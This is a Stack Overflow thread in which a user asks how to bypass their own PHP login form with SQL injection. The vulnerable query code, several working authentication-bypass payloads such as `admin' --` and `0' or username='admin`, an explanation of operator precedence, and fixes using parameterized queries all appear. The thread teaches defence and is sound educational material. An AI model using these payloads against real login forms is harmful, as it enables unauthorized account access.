# LOGIN by SQL Injection?

Tags: mysql, sql, sql-injection

I have the following code on my website and want to login by using SQL Injection. I tried some codes for it but couldnt have a result.

```
$username = $_POST['username'];
$password = $_POST['password'];

$query = "SELECT * FROM users WHERE username='$username' AND password='$password' LIMIT 1";
$sql = mysql_query($query);

if( mysql_num_rows($sql) == 1 )
{
    $row = mysql_fetch_array($sql);
    $_SESSION['id'] = $row['id'];
}
else
{
    echo $query;
}
```

Here are the codes I tried. In the first one I tried from username:

I mark my injected part as comment to make it easier to understand.

Username entered: `admin' or id=1 ; --`

```
SELECT * FROM users WHERE username='admin' or id=1 ; -- ' AND password='0' LIMIT 1"
```

And also I tried to enter by pass. With this code: `0' or '1'='1`

```
 SELECT * FROM users WHERE username='admin' AND password='0' or '1'='1' LIMIT 1"
```

What do I do wrong?

Comment: I'm no pen testing nor PHP expert, but would `' or 1=1;--` work?

Comment: It didnt :D I dont know just saw that a guy thid that.

Comment: @RaphaëlAlthaus I dont get any result for mysql_num_rows with it

Comment: There are automated testing tools like [SQLMap](http://sqlmap.org/) that know **all** the tricks and will give you a report on vulnerabilities.

Comment: What you are doing probably won't work as your hacked query will get any row where the username is 'admin' OR the id is 1. If admin has a different id than 1 then your query will bring back 2 rows, which would fail the check for the number of rows.

Answer (score 1, accepted):

You can just use this is in the **Username** parameter.

> admin%27%20--%20

**OR**

> admin%27%20OR%20%271

*This will definitely **break** the above authentication.*

*if this authentication page is called as like this.*

> **http://www.example.com/login.php**

Using POST parameters username and password.(That is entered by a textfiled from an HTTP form or anything).

> You can just fill the Username field with above two parameters.
>
> The above mentioned parameters are just URL encoded.If it is
>   decoded,it will resemble like this.
>
> admin' --

**OR**

> admin' OR '1

Comment: Im not sure what you wanted to tell can you explain a bit?

Comment: Sorry for the missing explaination it will be explained in the Answer EDit

Comment: Are you assuming OP is typing everything in the URL ?

Comment: Then simpy mark it as an answer and **VOTEUP**.It will be great for me

Comment: Hey dystroy.The above php page is using POST parameters.That cannot be passed like the URL parameters as using like GET.

Comment: Its K.Please fill your details and achieve the AutoBiographer Badge.

Comment: @ShihabSoft I've tried your tips but it does not work for me.. Please have a try in [these](http://www.devlabs.altervista.org/login/) [free test pages](http://www.devlabs.it/dev.login/admin/adm_login.php) and explain me what have I exactly to do. Thanks in advance.

Answer (score 1):

Let's say the table `users` contains 3 rows (BTW: a plaintext password?!? I sure hope not!!! [See this for best practice](https://stackoverflow.com/questions/401656/secure-hash-and-salt-for-php-passwords)):

```
 id | username    | password
  1   admin         letmein
  2   user3537391   Passw0rd
  3   Piskvor       123456
```

Each of the queries that you have managed to inject will now match *every one* of the rows, due to [operator](https://stackoverflow.com/questions/12345569/mysql-or-and-precedence) [precedence](http://dev.mysql.com/doc/refman/5.0/en/operator-precedence.html):

```
SELECT * FROM users WHERE username='admin' AND password='0' or '1'='1' LIMIT 1
```

evaluates as

```
SELECT * FROM users WHERE (username='admin' AND password='0') or '1'='1' LIMIT 1
```

Note that the rightmost term will match any row.
So, `if( mysql_num_rows($sql) == 1 )` evaluates to `if ( 3 == 1 )`, which is `if (false)`. Therefore, the application works, but only by accident.

(Why "by accident"? Let us try to craft a different injection:
Entering `0' or username='admin` would give us

```
SELECT * FROM users WHERE username='admin' AND password='0' or username='admin' LIMIT 1
```

The first term (`username='admin' AND password='0'`) won't match, but the second one will match 1 row exactly, thereby granting passwordless access.)

---

How to fix this:

- Ideally, use parametrized queries - [see this question](https://stackoverflow.com/questions/60174/how-can-i-prevent-sql-injection-in-php). `mysql_query` is deprecated and will be removed.
- If you REALLY, REALLY don't want to fix your code, at the very least escape the inputs. THIS IS ONLY AN EMERGENCY STOPGAP MEASURE, NOT A REAL SOLUTION - YOU SHOULD NOT BE WRITING NEW CODE LIKE THIS:

  `$username = mysql_real_escape_string($_POST['username']);
  $password = mysql_real_escape_string($_POST['password']);`

Comment: Awesome thanks Its really funny to hack my website :D

Comment: Better you than someone else :) This is a vulnerability so basic, it will be tried against you many times per hour by automated scripts.

Comment: thanks for the info about the escaping thing. i already know that. Just tring to test my skills in sqj injection.

Comment: Please do not advise people to "escape inputs". It's essentially misleading and injection prone. @user3537391 you should rather mention that you "already know parametrized thing", not escaping

Comment: @Your Common Sense: What? I have linked to a canonical source, suggested to use parametrized queries, and only then have I suggested a stopgap measure. Should I be denying its existence?

Comment: The problem is, it is not a measure at all. whatever "escaping" has nothing to do with injections. Seriously, escaping should be never mentioned as a protection measure.

Comment: Okay, whatever. Use CS's library, it is the best, escaping doesn't exist. Happy now?

Comment: @Piskvor I've tried your tips but it does not work for me.. Please have a try in [these](http://www.devlabs.altervista.org/login/) [free test pages](http://www.devlabs.it/dev.login/admin/adm_login.php) and explain me what have I exactly to do. Thanks in advance.

Comment: @Edward: No idea. What exactly do you mean by "does not work", how am I supposed to know without seeing your code?